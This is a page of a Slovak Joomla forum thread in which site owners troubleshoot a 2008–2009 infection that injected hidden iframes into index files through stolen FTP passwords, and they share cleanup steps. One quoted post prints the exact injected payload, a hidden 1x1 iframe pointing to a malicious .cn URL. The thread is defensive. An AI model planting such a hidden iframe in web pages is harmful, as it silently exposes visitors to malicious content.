Dobrý Deň, Hosť
Meno:  Heslo: Zapamätať  Obnoviť heslo | Registrovať
Pondelok, 21. Máj 2012 17:11
 
"Padnuta" stránka
Vitajte, Hosť. Prosím prihláste sa alebo sa zaregistrujte.

Prihláste sa užívateľským menom, heslom a dĺžkou sedenia

 
Pokročilé vyhľadávanie

24390 príspevkov v 4751 tém- od 64461 užívateľov - Najnovší užívateľ: Logan

Pondelok, 21. Máj 2012 17:11
Strán: 1 [2]
Tlačiť
Autor Téma: "Padnuta" stránka  (Prečítané 11669 krát)
0 užívateľov a 2 Hostí prehliada túto tému.
EMERICH
Jr. Member
**

Karma: +0/-0
Offline Offline

Pohlavie: Mužské
Príspevkov: 84


MERINEO


WWW
« Odpoveď #15 kedy: Piatok, 21. November 2008 09:12 »

Takze moja domnienka po analyze problemu je nasledovna:
1. v ten isty den som robil update na dvoch strankach z 1.5.7 na 1.5.8, stranky doteraz bezia bezchybne, je tam nastavene 755 na adresare, uz asi tyzden su bez skodliveho kodu v index.php a nejako si ani nespominam ze by tam bol...
2. jednu stranku som updatol par dni po tychto dvoch, rovnakym sposobom, vsetko prebehlo rovnako, mam rovnake nastavenia, na tejto stranke som zistil skodlivy iframe v kazdom index.html co je na stranke - skontrolujte si to, v podstate cela stranka je nakazena, ak je moja tak budu aj tie vase, hladajte hlavne v index.html....
3. z toho mi vyplyva, ze ked bola vydana nova verzia joomly, niekto stranky updatnut stihol, niekto nie, medzitym tam uz vliezol malvare a ten robi sarapatu....na joomla.org to rozoberaju, ale nerozumiem celkom vsetkemu, ak sa v tom niekto vyzna a poradi budem velmi rad...tu je link
http://forum.joomla.org/viewtopic.php?f=432&t=345314&start=30

Taka otazka, mam urobenu zalohu, ktora nie je infikovana, skontroloval som ju, myslite ze pomoze ked poprosim aby mi hosting kompletne premazal moj webserver a takto to obnovim? zatial jedine co ma napadlo....hladam dalej...
Zaznamenané
EMERICH
Jr. Member
**

Karma: +0/-0
Offline Offline

Pohlavie: Mužské
Príspevkov: 84


MERINEO


WWW
« Odpoveď #16 kedy: Piatok, 21. November 2008 15:43 »

moje dalsie "zistenia":
1. infikovane su zasadne iba subory s nazvom index(php, html)...neviem ci to niekomu pomoze ale snad ano
2. z pocitaca o ktorom viem ze je cisty (ziadny spyware) som zmenil prihlasovacie hesla na FTP, niekde na webe som sa docital ze je to nejaky trojan co precita heslo a potom sa cez ne prihlasi 3 osoba a robi to co robi...zatial to funguje cakam, co bude zajtra, kedze to ma asi denny cyklus, ak to vydrzi tak mame riesenie...
3. viem odkial je nakazena Joomla 1.0.15 - mal som tam nainstalovany jeden z rozsireni, ktore su oznacene ako bezpecnostne riziko - Joofish....preto to dokazalo napadnut aj stabilnu verziu Joomla!
4. vyvstal novy problem - ako odstranit z napadnutej stranky ten skodlivy kod, ked je to v kazdom index subore....bohuzial zalohu tejto stranky nemam (taku ktora by bola cista)...ak vie niekto poradit bude rad....

Snad som niekomu skusenejsiemu pomohol a vnukol napad....vsetkym drzim palce

P.S: napadlo to aj system WordPress, presne to iste, takze v tom nie sme sami...Smiley
Zaznamenané
Darthmor
Newbie
*

Karma: +0/-0
Offline Offline

Príspevkov: 3


« Odpoveď #17 kedy: Sobota, 22. November 2008 01:59 »

No nedalo mi to, nezapojiť sa do tejto debaty  Tongue

Ja tento problém riešim už zhruba týždeň.
Spočiatku mi to premazávalo len občas, asi tak každý 2-3 deň. Neskôr už aj 2x denne. Vždy som to riešil nahratím stránky zo zálohy, ale aj tak ma to zasa napadlo a všetko prepísalo.
Neviem z toho presne z istotou povedať čo je problém v joomle alebo nie, ale jedno viem naisto a to, že to neničí len joomlu ale ako už emirich spomenul pokazí to aj wordpress, a v mojom prípade tiež phpBB3 a rovnako aj obyčajný ručne písaný index.php, ktorí je len titulka s odkazmi na subdomány.
Maže to niekedy podľa nálady, raz len hlavné časti ako index.php, ktoré sú aktívne napr. úvodný v joomle potom v amdinistrácií a tiež aj aktuálny index ku template. Ale niektoré zmení aj čo sú "pasívne".
Atribúty mám na všetko 604 okrem povinných vecí, ktoré musia byť na 777 a pod.

20.11.08 mi z hostingu na moje požiadanie zmazali celý obsah www_root a ja som tam hneď nato nahral zálohu a nechcem to zarieknuť, ale zatiaľ mi to ide bez napadnutia. police

Aby som nezabudol, menil som prístupové hesla na ftp účtoch cez setup.sk a zjavne pomohlo aj to. knuppel2

Ohľadne vírusov neviem ako to presne je ale je pravda, že som aj na HDD našiel 2 vírusy cez ESET a nejaké hlúposti aj cez Ad-Aware.

Možno sa mýlim ale momentálne to chápem asi tak, že zrejme na hostingu behá nejaký vírus, ktorí si zisťuje postupne heslá a mení si index.php. Nechce sa mi totiž veriť, že to robí nejaký človek ručne tým, že si dá zistiť heslá nejakým červom a potom to pekne prepisuje.
Tiež nechápem zámer toho somára čo to robí, buď nech nám na stránke zničí všetko alebo sa nato vykašle. tickedoff Heslá nám asi zmeniť nemôže, lebo by potreboval ešte zistiť aj prístup na setup.sk.

preto skúste nasledovnú variantu: Afro
1. preverte si Váš PC, na ktorom spravujete web na vírusy a pod svinstvo
2. na www.setup.sk si zmente všetky prístupy na FTP účty
3. zmažte veškerý obsah na FTP, alebo ako som to spravil ja požiadajte o kompletné zmazanie /www_root/ administrátora hostingu
4. z čistého PC a z novými heslami nahrajte zálohu, o ktorej si myslíte, že nie je napadnutá
5. neostáva nič iné len 1-3 dni počkať či sa to znova vráti  Wink

Zaznamenané
EMERICH
Jr. Member
**

Karma: +0/-0
Offline Offline

Pohlavie: Mužské
Príspevkov: 84


MERINEO


WWW
« Odpoveď #18 kedy: Sobota, 22. November 2008 10:24 »

tak pani po vcerajsich upravach mi dneska bezia obe napadnute stranky t. j. aj 1.5.8 aj 1.0.15, podobne ako pise kolega hore, tento jeho postup by mal fungovat, s malymi upravami som ho vcera uplatnil (precistenie, ftp, zmena atrib na 755), dokonca aj ked nemate cistu zalohu ako ja, ked dodrzite zvysok tak je stranka kludna, akurat tak ako ja (kedze som sprosty), musim precistovat celu webstranku Smiley, hadam sme nasli riesenie teda....a suhlasim s nazorom vyssie, ocividne to robi nejaky bot, akurat dovod preco to nemaze je ten ze to hadze odkaz na ten web traffone.cn, takze v podstate to tvori feedbacky na tu stranku...premyslene...Smiley
Zaznamenané
phillix
Newbie
*

Karma: +0/-0
Offline Offline

Príspevkov: 4


Skusam co joomla vydrzi :)


« Odpoveď #19 kedy: Pondelok, 09. Marec 2009 01:54 »

heh no super, uz aj ja som to chytil. napadlo to 3weby , jeden joomla, jeden kodeny v html a jeden v php. pravdepodobne mi to odchytil nejaky trojan ktory som nasiel v pccku.  knuppel2.
vzdy to napadlo index .
Zaznamenané
oxyz24
Newbie
*

Karma: +0/-0
Offline Offline

Príspevkov: 11


« Odpoveď #20 kedy: Pondelok, 06. Apríl 2009 12:26 »

mne to robi od konca marca a ono to nie len index.php napada...
ono mi to napada vsetky subory index.php/html a nie len v joomle ale na celom webe (!!!)
a nenapadlo mi to len indexy, ale aj ine subory...
skuste si to prejst ak to este mate, tie napadnute, tak celu joomlu su dajte v totl commanderi vyhladat: iframe v suboroch (nie nazov!)  datum kedy priblizne to bolo od prvej zmeny toho indexu a najde vam to vsetky, kd eje ten kod
ono to podla mna na web nieco vlozi a automaticky to tie subory upravuje vsetky

neviem, moc sa do tychto vei nevyznam, ale sere ma to tickedoff
Zaznamenané
oxyz24
Newbie
*

Karma: +0/-0
Offline Offline

Príspevkov: 11


« Odpoveď #21 kedy: Pondelok, 06. Apríl 2009 13:14 »

takze toto som nasiel na diskusnom fore phorum.ic.cz:

Virus, který se Vám dostal do PC naskenoval Vaše FTP přístupy, zřejmě používáte Total Commander (soubor c:/windows/wcx_ftp.ini). Pak dekompiloval hashované heslo (existuje spousta nástrojů) a přihlásil se na FTP, vyhledává soubory index, default, homepage a do kódu vkládá ( většinou hned za <body>) následující iframe: <iframe src="http://nameashop.cn/in.cgi?income33" width=1 height=1 style="visibility: hidden"></iframe>

Dále napadá funkčnost antiviru a práva administrátora PC k instalaci jiného antiviru.
Řešení:
-Změna přístupových údajů k FTP
-Odstranění souborů wiaserva.log a AgCPanelKoreanf.exe z PC


Více naleznete na http://clonet.cz/phpBB3/viewtopic.php?f=70&t=91
Zaznamenané
canalmedia
Newbie
*

Karma: +0/-0
Offline Offline

Pohlavie: Mužské
Príspevkov: 35



WWW
« Odpoveď #22 kedy: Utorok, 21. Apríl 2009 09:41 »

Zdravim, tak padli aj mne vsetky stranky.. Vdaka za vase info.. Pomohli..
S jednou si vsak neviem rady.. Ako jedina je nasadena na JIE.. Vsetky iframe odstranene.. Dokonca aj kodovane scripty v base64 odstranene a stale tam nieco natahuje.. A nefunguju mi tam viacere doplnky v javascripte.. Poradi niekto pls?
http://www.ekompas.sk
Zaznamenané

oxyz24
Newbie
*

Karma: +0/-0
Offline Offline

Príspevkov: 11


« Odpoveď #23 kedy: Utorok, 21. Apríl 2009 15:48 »

neviem, ci hovorim na spravnu vec, ale mozno to pomoze, ze ja ked som vymazaval tieto iframey, tak mi to este do niektorych vlozilo take nieco, ze "echo;"
alebo teda neviem ci to tam malo byt Cheesy a ked som to vymazal, tak mi isla stranka v poriadku, ako predtym Wink
Zaznamenané
canalmedia
Newbie
*

Karma: +0/-0
Offline Offline

Pohlavie: Mužské
Príspevkov: 35



WWW
« Odpoveď #24 kedy: Štvrtok, 30. Apríl 2009 13:19 »

Tak sa s tym "pasujem" uz tri tyzdne, medzitym som nasiel a odstranil dalsie dva druhy kodov (scripty) ale stale tam este nieco je Sad
Posladne dni mi to uz ani nechce nacitavat poriadne, stale natahuje adresu 94.247.2.195. Ked sa chcem dostat do admina, musim cakat aj par minut kym nieco nabehne Sad
Poradi este niekto pls?
Zaznamenané

Michal Hraška
Global Moderator
Hero Member
*****

Karma: +29/-0
Offline Offline

Pohlavie: Mužské
Príspevkov: 4056



« Odpoveď #25 kedy: Štvrtok, 30. Apríl 2009 16:01 »

Jednoduche riešenie. Všetko zmazať a potom nanovo nahrať joomla a postupne doplniť dane veci.

Pred tým si to pre istotu zálohuj. FTP aj Databázu.

Neviem co presne všetko máš na stránke ale tak skus to napísať možno sa to bude dať jednoducho všetko ponadhadzovať.
Zaznamenané
canalmedia
Newbie
*

Karma: +0/-0
Offline Offline

Pohlavie: Mužské
Príspevkov: 35



WWW
« Odpoveď #26 kedy: Štvrtok, 30. Apríl 2009 16:30 »

Tak uz je to OK.. Vdaka vsetkym za rady.. Nasiel som aj posledny kod  Cool
Zaznamenané

Strán: 1 [2]
Tlačiť
Prejsť na: